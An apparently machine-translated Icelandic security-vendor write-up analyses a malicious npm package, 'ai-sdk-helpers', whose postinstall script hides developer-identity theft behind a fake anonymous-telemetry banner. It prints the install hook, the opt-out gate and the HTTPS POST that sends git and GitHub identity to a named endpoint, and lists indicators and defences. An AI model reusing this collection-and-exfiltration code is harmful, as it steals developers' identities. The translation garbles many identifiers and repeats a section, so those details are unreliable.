ConsentMask npm pakkinn sem felur söfnun auðkennis forritara

ConsentMask: npm pakki sem ber samþykkismerki fyrir fjarmælingar fram yfir söfnun auðkennis forritara

TL; DR

Einn npm pakki, ai-sdk-hjálparar, kynnir sig sem framleiðsluverkfærakista fyrir Vercel AI SDK, sem býður upp á kostnaðarmælingar, varahluti fyrir veitendur og aðstoð við streymi.

Uppsetningarhandritið opnast með glæsilegum upplýsingaborða sem lýsir nafnlaus greining, sem lofar að enginn frumkóði, tákn eða skilríki séu send, og virðir DO_NOT_TRACK afþakka og tengja við síðu um stefnu um fjarmælingar.

Sama handrit les síðan git auðkenni forritarans, GitHub CLI stillingar, hýsingarheiti vélarinnar, notandanafn stýrikerfis, vinnuskrá og CI veitu.

Þessi gögn eru POSTuð sem JSON á endapunkt Google Cloud Run, sem skapar greinilega ósamræmi milli tilgreindrar fjarmælingastefnu og raunverulegra reita sem safnað er.

Pakkinn var gefinn út í tuttugu og tveimur útgáfum innan einnar 83 sekúndna lotu og uppsetningarforskriftin er eins bæti fyrir bæti í öllum merktum útgáfum.

Sjö af átta útgáfum sem við skoðuðum pipeline voru ófullnægjandi einkunnir samkvæmt ML-flokkaranum vegna þess að hönnun samþykkisborðans líkist lögmætri fjarmælingu.

Við flokkum ai-sdk-helpers sem illgjarn byggt á söfnun og útrýmingu auðkenna forritara við uppsetningu.

Alvarleiki: mikill.

 Líffærafræði uppsetningarinnar

{   "scripts": {     "postinstall": "node scripts/postinstall.js"   } }

eftir uppsetningu keyrir sjálfkrafa á npm setja í embætti, áður en nokkur auglýstur kóði pakkans er fluttur inn. Handritið forskriftir/postinstall.js er þar sem öll hegðunin við uppsetningu býr.

Það opnast með athugasemdarblokk og tilkynningu um keyrslutíma sem er skrifuð í skrá yfir verkefni með opinn hugbúnað sem er meðvitað um friðhelgi einkalífsins:

>Þegar þú setur upp ai-sdk-helpers keyrum við fljótlega umhverfissamrýmanleikaprófun og tilkynnum nafnlausar greiningar... Gögnin eru algjörlega nafnlaus — við söfnum kerfinu þínu, hnútaútgáfu og einstefnu kjötkássu af vélaauðkenni þínu. Enginn frumkóði, tákn eða innskráningarupplýsingar eru nokkurn tímann sendar.

Það tengir jafnvel virkan afþakkanarhlið, fyrsta keyranlega kóðann í skránni:

if (   process.env.AI_SDK_HELPERS_TELEMETRY_DISABLED === "1" ||   process.env.DO_NOT_TRACK === "1" ) {   process.exit(0); }

Að festa þetta hlið fyrst er það sem gerir það að verkum að restin lesist sem samhljóða: verktaki sem setur `D_EKKI_REKJA` Lætur uppsetninguna ljúka hljóðlega og lýkur því að pakkinn virðir hefðina. Þessi virta afþökkun er raunveruleg. Það sem hún leyfir, fyrir alla sem ekki stilla hana, er safnið sem lýst er hér að neðan — ekki þrengra „pallur, hnútaútgáfa og einstefnukjöllu“ sem tilkynningin nefnir.

Fyrir neðan þetta hlið setur handritið saman farm sem fer langt fram úr þeirri lýsingu.

  • *Gt sjálfsmynd.* rleysaScmAuðkenni()` eður `~.gitconfig`,`~.stillingar/git/stillingar`,og `` núverandi verkefnis.það/stillingar`,greinir `[ser]` kafli og skilar stilltu commit tölvupóstur. Ef engin stillingarskrá gefur tölvupóst, þá notar hún aftur `G`T_AUTHOR_EMAIL`,`GT_COMMITTER_EMAIL`,og `EAIL` Umhverfisbreytur. Strengur fyrir ofan fallið rammar inn lesturinn sem leið til að „afkóða uppsetningar á milli véla í eigu sama aðila (t.d. fartölva + CI)“ — yfirlýst markmið sem krefst stöðugs auðkennis fyrir hvern forritara, sem a commit tölvupóstsbirgðir.
  • *GtHub reikningur.* rleysaGitHubIdentity()` eður `~.stillingar/gh/hosts.yml` og `~.stillingar/gh/hosts.yaml` Stillingarskráin sem er skrifuð af GitHub CLI þegar forritari staðfestir — og dregur út `u með regexöh:` og eillt:` fields. Sú skrá geymir einnig GitHub OAuth táknið; regex handritsins miðar sérstaklega á notandanafnið og netfangið og dregur ekki út táknið. Fullyrðingin „engin tákn… eru nokkurn tíma send“ í upplýsingagjafarborðanum á því bókstaflega við um þann reit á meðan auðkenni reikningsins í kring eru lesin og send.
  • *Hfingrafar st og CI.* Handritið safnar síðan `o.hýsingarheiti()`,`o.notandaupplýsingar().notandanafn`,Útgáfa, kerfi og arkitektúr Node, `pocess.cwd()`,og CI-veitumerki sem leyst var með því að athuga umhverfisbreytur fyrir átta veitendur (GitHub Actions, GitLab CI, Jenkins, CircleCI, Travis, Buildkite og tvö almenn CI fána). Veitulistinn les sem skrá yfir hvar handritið á að keyra — gagnvirkar skeljar og sjálfvirk smíði. pipelineer eins.

Allt þetta er flokkað í eitt `d`agnostics hlutur, með reitunum fyrir hvern forritara safnað saman undir `ieining ey og gestgjafagögnin undir `rntími og `cntexti eys, síðan raðað og sent:

const req = https.request(   {     hostname: "npm-package-logger-228835561205.europe-west1.run.app",     path: "/",     method: "POST",     headers: { "Content-Type": "application/json" },     timeout: 5000,   },   () => {} );  req.on("error", () => {}); req.write(body); req.end();

Svarinu er hafnað og öllum villum er kyngt — athugasemd bendir á að „fjarmælingar mega aldrei trufla uppsetninguna.“ Hýsingarheiti endapunktsins kóðar fyrir Google Cloud Run þjónustu í `ereipi-vestur1` svæði.

Bilið er sagan. Borðinn nefnir þrjá flokka gagna — vettvang, hnútaútgáfu og vélaauðkenniskóða. Notkunin sendir raunverulegt git forritara. commit netfang, notandanafn og netfang á GitHub, hýsingarheiti vélarinnar og nafn stýrikerfisreiknings, verkefnaslóð og upplýsingakerfisumhverfi. Reitirnir sem auðkenna *prson og reikningar þeirra* eru nákvæmlega þeir reitir sem upplýsingagjöfin sleppir.

README skjalið styrkir rammann frá hinni hliðinni. Hlutinn „Fjarmælingar“ endurtekur nafnleyndarkröfuna og tengir orðið `D`._EKKI_REKJA` o `cnsoledonottrack.com`,raunverulega samfélagssíðan sem skjalfestar samninginn um að hafna ákvæðinu — að láni viðurkennda friðhelgi einkalífsins standard til að láta tilkynninguna lesast sem venjubundna.

Timeline

Þetta er einpakkning með mjög stuttri og þéttri útgáfusögu. Það er engin margra vikna herferðarferill til að rekja — allt útgáfusviðið var þróað á vélhraða.

Hvenær (UTC) atburður
2026-06-03 20:31:20 Fyrsta útgáfa (0.1.0) birt á npm.
2026-06-03 20:31:20 – 20:32:43 Allar 22 útgáfur (0.1.0 og yfir 1.4.2) birt í 83 sekúndna sjálfvirkri myndaseríu.
2026-06-04 Átta útgáfur merktar með greiningarmerkjum; handvirk greining staðfestir söfnun og fjarlægingu auðkenna við uppsetningu. Pakkinn var enn virkur á npm þegar greiningin fór fram.

83 sekúndna glugginn yfir 22 merkingarfræðilegar útgáfur er í sjálfu sér hegðunarvísir: útgáfustiginn (`01.0 tommur`01.1 tommur... `14.2 tommur)sýnir yfirborð verkefnis sem er í virkri viðhaldi með útgáfusögu, sem er búin til í einni handritaðri keyrslu. Uppsetningarhandritið breytist ekki í gegnum þann stiga — sjá hér að neðan.

Vísbendingar um málamiðlun

Notkunarmagn á uppsetningartíma er eins í öllum birtum útgáfum.ff` f `sripts/postinstall.js` milli útgáfa `02.1` útgáfa `14.2` skilar engum mismun; hegðunin er eitt fast fingrafar, ekki síbreytileg farmur.

Net

83 sekúndna glugginn yfir 22 merkingarfræðilegar útgáfur er í sjálfu sér hegðunarvísir: útgáfustiginn (`01.0 tommur`01.1 tommur... `14.2 tommur)sýnir yfirborð verkefnis sem er í virkri viðhaldi með útgáfusögu, sem er búin til í einni handritaðri keyrslu. Uppsetningarhandritið breytist ekki í gegnum þann stiga — sjá hér að neðan.

Vísbendingar um málamiðlun

Notkunarmagn á uppsetningartíma er eins í öllum birtum útgáfum.ff` f `sripts/postinstall.js` milli útgáfa `02.1` útgáfa `14.2` skilar engum mismun; hegðunin er eitt fast fingrafar, ekki síbreytileg farmur.

Net

Vísir Hlutverk
npm-package-logger-228835561205.europe-west1.run.app Útsíun endapunktur sem tekur við HTTPS POST beiðnum með JSON hleðslum. Hýst á Google Cloud Run í europe-west1 svæði.

Innviðir fyrir tálbeitu

Vísir Hlutverk
ai-sdk.guide Heimasíða pakkans og virka síða sem styður höfundaauðkenni „AI SDK Guide“.
ai-sdk.guide/telemetry Vefslóð fyrir stefnu um fjarmælingar sem vísað er til í upplýsingagjöf við uppsetningu.
hello@ai-sdk.guide Netfang höfundar gefið upp í package.json.
github.com/ai-sdk-guide/ai-sdk-helpers Upprunalega geymslan sem pakkinn skilgreindi.

Skrár lesnar við uppsetningu

  • -.gitconfig`,`~.stillingar/git/stillingar`,`<wd>/.git/stillingar` git `[ser]` póstur
  • - .stillingar/gh/hýsingar.yml`,`~.stillingar/gh/hosts.yaml` GitHub CLI `uer` `eaumingja

Hegðunareinkenni

  • – m`pstöðvun ook kallar á meðfylgjandi Node handrit
  • – afþakkarhlið (`A_SDK_HJÁLPAR_FJÖLMÆLINGAR_ÓGERÐAR`,`D_EKKI_REKJA`)kynnt sem persónuverndaraðgerð, áður en persónuupplýsingar eru safnaðar
  • – tbound HTTPS POST af JSON hlut sem inniheldur git netfang, GitHub auðkenni, hýsingarheiti, notandanafn stýrikerfis, cwd og CI merki
  • – eins uppsetningarhandrit yfir útgáfustiga sem birtist hratt

 Eiginleiki og athuguð hegðun
Við tilgreinum ekkert annað en það sem pakkinn og lýsigögn skrásetningarinnar skrá.

Sá sem heldur utan um skráningu npm er reikningurinn `aielsimon`,með heimilisfanginu `aiel@vigilance.security`.Skráningarkerfið skráir þetta netfang sem óstaðfest og upprunastýringarauðkenni reikningsins sem óstaðfest. `p`ckage.json`,sérstaklega, kynnir höfundinn sem „Leiðarvísir fyrir AI SDK“ello@ai-sdk.guide>`”með heimasíðu `a-sdk.guide` og frumkóðageymslu undir `gSamtökin thub.com/ai-sdk-guide`. Netfangslén útgáfureikningsins (`vigilance.security`)og höfundaauðkenni pakkans (`a`)-sdk.guide`)eru mismunandi lén.

Þetta-sdk.guide` ite er virkt og svarar, og `/rafeindamælingar ath leysist upp — auðkenni tálbeitu er stutt af aðgengilegri vefviðveru frekar en dauðum tengli, sem eykur trúverðugleika ramma pakkans.

**Athugasemd.** Við uppsetningu les pakkinn skrár um auðkenni forritara og stillingar reikninga, tekur fingraför af hýsil- og upplýsingakerfaumhverfinu og sendir niðurstöðuna á endapunkt sem stjórnað er af notanda, en birtir tilkynningu sem lýsir þrengra og nafnlausara gagnasafni. Við lýsum þessari hegðun; við fullyrðum ekki ástæðu fyrir henni. Lesendur sem meta pakkann - þar á meðal allir aðilar sem þekkja útgáfuauðkennið - ættu að vega og meta sýnilegt ósamræmi milli tilgreindra og raunverulegra gagnaflæðis.

Áhrif, þróun og leiðbeiningar fyrir verjendur

Hver er berskjaldaður. Hver sem er sem setur upp ai-sdk-hjálparar — beint eða sem tímabundið ósjálfstæði — keyrir safnið á þeirri vél. Vegna þess að kveikjan er eftir uppsetningu, auglýsti bókasafnskóðinn þarf aldrei að vera fluttur inn til að gagnaflæðið eigi sér stað; uppsetningin ein og sér nægir. Verðmætustu umhverfin eru vinnustöðvar forritara með stilltu git-auðkenni og staðfestu GitHub CLI, og CI keyrslur, þar sem CI-veitugreining handritsins gefur til kynna að búist sé við að safnið keyri innan byggingarinnar. pipelinesem og á fartölvum.

Það sem það afhjúpar. Ekki leyndarmál forrita í almennu tilfelli — farmurinn miðast við sjálfsmynd: verktaki commit netfang, nafn og netfang GitHub reikningsins, nöfn vélarinnar og reikningsins og slóð verkefnisins. Það er forstillingcisKort af því hver setti upp pakkann, á hvaða vél, í hvaða geymslu og undir hvaða CI kerfi. Fyrir fyrirtæki/stofnun myndu nokkrar slíkar skrár saman telja upp hvaða verkfræðingar og hvaða byggingarkerfi drógu upp ósjálfstæðið — gagnlegt sem undanfari markvissari framhaldsstarfsemi, jafnvel þó að hegðun þessa pakkans sjálfs stöðvist við söfnun og sendingu.

Þróunin: fjarmælingar sem skjól. Lögmæt forritunartól safna nafnlausum uppsetningargreiningargögnum og venjurnar um að gera það á virðulegan hátt - upplýsingagjöf, EKKI_REKJA heiður, flagg til að afþakka notkun, vefslóð fyrir stefnu — eru vel þekkt. ai-sdk-hjálparar endurskapar allar fjórar þessar venjur nákvæmlega og notar þær sem umbúðir fyrir söfnun auðkenningar. Tilvist samþykkisborða, virkrar afþakkanar eða tengils á persónuverndarstefnu er ekki sönnun þess að pakki sé traustverður; það er ódýrt að herma eftir þessum stýringum. Eina áreiðanlega eftirlitið er hvað kóðinn les í raun og veru og hvert hann sendir hann í raun.

Þessi umbúðir hafa einnig mælanleg áhrif á sjálfvirka flokkun. Í öllum útgáfum okkar pipeline Yfirfarið, athugasemdir uppsetningarhandritsins á einföldu máli, skipulögð reitanöfn og hefðbundin afþökkunarhlið voru metin sem venjuleg fjarmæling: sjö af átta komu til baka ófullnægjandi frá ML flokkaranum frekar en illgjarn. Merkið sem leysir tvíræðnina er ekki í textanum — það er í þeim sérstöku skrám sem handritið opnar (~/.gitconfig, ~/.stillingar/gh/hýsingar.yml) og áfangastaðinn sem það sendir til. Yfirlesari, sjálfvirkur eða manneskja, sem les upplýsingagjöfina og stoppar þar mun komast að röngum niðurstöðum; ákvörðunin verður að koma frá staðreyndum gagnaflæðisins.

Leiðbeiningar fyrir varnarmenn:

  • Setja upp með forskriftum óvirkum sjálfgefið — npm uppsetning –hunsa-forskriftir, eða setja hunsa-scripts=satt in .npmrc og keyra yfirfarin smíðaskref sérstaklega. Þetta hlutleysir eftir uppsetningu-kveikt innheimtu á öllum sviðum.
  • Ekki líta á afþakkanastýringar sem traustmerki. EKKI_REKJA Athuga eða tengill á „fjarmælingarstefnu“ segir ekkert um gögnin sem handrit safnar þegar hliðið er ekki stillt.
  • Lestu uppsetningarhookinn áður en þú tekur upp hjálparpakka fyrir gervigreindarvistkerfi. Vercel AI SDK rýmið er hraðvirkt og traust markmið; eftir uppsetningu sem snertir ~/.gitconfig or ~/.stillingar/gh/ er skýrt merki óháð því hvernig athugasemdirnar í kring eru skrifaðar.
  • Eftirlit með útgöngu á byggingartíma. Útleiðandi HTTPS POST á meðan npm setja í embætti, sérstaklega við nýúthlutaðan endapunkt skýjavirkni, er sýnilegt á netlaginu og er sterkur greiningarpunktur fyrir CI umhverfi.
  • Fylgist með þjöppuðum útgáfustigum. Pakki þar sem öll merkingarfræðileg útgáfassaga birtist innan nokkurra sekúndna, með óbreyttu uppsetningarforskrift, sýnir tilbúna viðhaldssögu.
sca-tools-hugbúnaður-samsetningargreiningartól
Forgangsraðaðu, lagfærðu og tryggðu hugbúnaðaráhættu þína
Fáðu þér ókeypis aðgang.
Ekkert kreditkort krafist.

Tryggðu hugbúnaðarþróun og afhendingu þína

með Xygeni vörupakkanum